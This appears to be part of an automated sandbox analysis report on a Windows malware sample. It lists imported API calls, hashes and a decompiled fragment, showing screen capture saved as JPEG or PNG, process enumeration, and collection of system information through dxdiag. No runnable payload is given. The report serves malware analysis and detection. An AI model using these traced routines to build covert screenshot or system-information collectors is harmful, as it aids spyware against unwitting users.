                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F83C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F84C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 0040F86D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F879
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F882
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F88E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F89A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8A6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8B2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8BE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F856
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F900
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F909
                                          • Part of subcall function 0040F984: GdipDisposeImage.GDIPLUS(?,00410AE2), ref: 0040F98D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$Create$D@1@@$?size@?$basic_string@G@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@Stream_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@connectsocket
                                        • String ID: image/jpeg
                                        • API String ID: 1042780377-3785015651
                                        • Opcode ID: b0730c79e71e437cfddf2c56560b672f6144d9d155c94930c0d9f44daa166224
                                        • Instruction ID: 2cf9f006c0d4929ef9c332e6db0d7f76cf60b2cff1cc21eb26a78d91115eee6c
                                        • Opcode Fuzzy Hash: b0730c79e71e437cfddf2c56560b672f6144d9d155c94930c0d9f44daa166224
                                        • Instruction Fuzzy Hash: 74915172900109ABDB10EFA1DC49EEF7B7CEF54304F00847AF916A7191EB745A49CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                          • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                          • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                          • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                          • Part of subcall function 0040F925: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F942
                                          • Part of subcall function 0040FE07: malloc.MSVCRT ref: 0040FE2E
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                          • Part of subcall function 00410AF7: GdipSaveImageToFile.GDIPLUS(?,004109D1,?,00000000,00000000,?,004109D1,00000000), ref: 00410B09
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                        • DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410A8A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410A98
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410AA1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410AB1
                                          • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                          • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                          • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AC2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410ACB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AD4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AE5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AEE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$Create$?size@?$basic_string@D@1@@File$?data@?$basic_string@G@1@@G@2@@0@GdipHstd@@ImageStreamV01@@V10@V?$basic_string@$?length@?$basic_string@CompatibleDeleteFromLoadSavemalloc
                                        • String ID: dat$image/png$png
                                        • API String ID: 3276867942-186023265
                                        • Opcode ID: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                        • Instruction ID: 6c1464b703b8d6621652859688a13e3a01469ca8af73c80fd23fe2d238e37a16
                                        • Opcode Fuzzy Hash: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                        • Instruction Fuzzy Hash: 4F41E87280050DEBCB05EBE0ED5A9EE7B78EF54345B50807AF506A70A1EF745B48CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                          • Part of subcall function 00412AEB: GetCurrentProcess.KERNEL32(00408F3A,?,?,00408F3A,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00412AFC
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                          • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                          • Part of subcall function 00412B4A: OpenProcess.KERNEL32(00000410,00000000,00409B39,6F60CB60), ref: 00412B5E
                                          • Part of subcall function 00412B4A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409FE3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409FF0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040A000
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A00C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A018
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A021
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A02D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A036
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A042
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A04B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A057
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A060
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A069
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A075
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A081
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A08D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A099
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0A2
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A0B0
                                        • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 0040A0BF
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 0040A0CC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0D5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32$G@1@@NextOpenV01@@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                                        • String ID:
                                        • API String ID: 819894693-0
                                        • Opcode ID: 6d7e0a8e1be64d4d0e255c379d67c754dda12e9502e18d4a3b94b6445093a707
                                        • Instruction ID: 482952a8ea0ca2eb956ab1d6be5e182e2b7f1aefe0fc538246f9d1fd03369c75
                                        • Opcode Fuzzy Hash: 6d7e0a8e1be64d4d0e255c379d67c754dda12e9502e18d4a3b94b6445093a707
                                        • Instruction Fuzzy Hash: B151E07180021EABCB15EBA1ED49EDFB77CAF54345F0040A6B506E3052EB745B89CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wgetenv.MSVCRT ref: 0040E93E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,00000000), ref: 0040E949
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040E954
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E95F
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,/t ,?,00000000,00000000), ref: 0040E976
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000), ref: 0040E980
                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,?,00000000), ref: 0040E992
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000,00000000), ref: 0040E99B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000), ref: 0040E9A8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000000,00000000), ref: 0040E9B7
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • Sleep.KERNEL32(00000064,00000000,00000000), ref: 0040E9C7
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9D1
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9E6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E9F7
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040E9FE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040EA3C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040EA46
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000097,?,?,?,?,?,?), ref: 0040EA5E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA77
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA80
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@$G@2@@std@@$??1?$basic_string@D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@?empty@?$basic_string@D@2@@0@FileG@2@@0@V10@0@$CreateD@1@@DeleteExecuteG@1@@ShellSleepV10@V10@@_wgetenv
                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                        • API String ID: 1966616101-2001430897
                                        • Opcode ID: ff0e39e396bbf46ea60dadb1ea34f8f26dedf6304284c23b1de840788f93d481
                                        • Instruction ID: 1c5eb7ae2d6a6dc7204c520a9e58a8966c6b8e2557f2cc0bdb06ecab60d4e380
                                        • Opcode Fuzzy Hash: ff0e39e396bbf46ea60dadb1ea34f8f26dedf6304284c23b1de840788f93d481
                                        • Instruction Fuzzy Hash: 0D41657280050DEFCB04EBE0ED4ADEEB77CEE54345B10402AF912A3091EB755A49CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 00402291
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6F5E5DF0), ref: 00402302
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402363
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040236D
                                        • CreateThread.KERNEL32(00000000,00000000,?,0041BE70,00000000,00000000), ref: 0040237E
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402389
                                        • CloseHandle.KERNEL32(00000000), ref: 00402392
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040D2B5,6F5E5DF0), ref: 004023A7
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023B1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023BA
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023C3
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E3
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@CloseD@1@@EventHandleObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 3745950881-0
                                        • Opcode ID: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                        • Instruction ID: 9121e1d36d2ed1e5780a03bc3f6ba97c1b97061ac4fd9a6be39e0f6b7c1c719d
                                        • Opcode Fuzzy Hash: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                        • Instruction Fuzzy Hash: 0451FD7250060EEFCB049FA0DD88CEEBB78FF84355B00806AF916A71A0DB745985CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 34%
                                        			E0040295E(void* __eflags, intOrPtr _a4, char _a7) {
                                        				char _v5;
                                        				void* _v12;
                                        				char _v28;
                                        				void* _v44;
                                        				char _v60;
                                        				char _v76;
                                        				char _v92;
                                        				struct tagMSG _v120;
                                        				int _t29;
                                        				void* _t35;
                                        				intOrPtr _t41;
                                        				void* _t45;
                                        				void* _t50;
                                        				void* _t51;
                                        				void* _t62;
                                        				void* _t63;
                                        				intOrPtr _t95;
                                        				void* _t97;
                                        				void* _t101;
                                        				void* _t104;
                                        				void* _t105;
                                        				void* _t107;
                                        
                                        				_t107 = __eflags;
                                        				_t95 = _a4;
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t95 + 0x18);
                                        				_t29 = SetEvent( *(_t95 + 0x28));
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				E004129EB(_t107,  &_v28,  &_v76,  &E0041B310,  &_v76, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                        				_t104 = _t101 + 0x24;
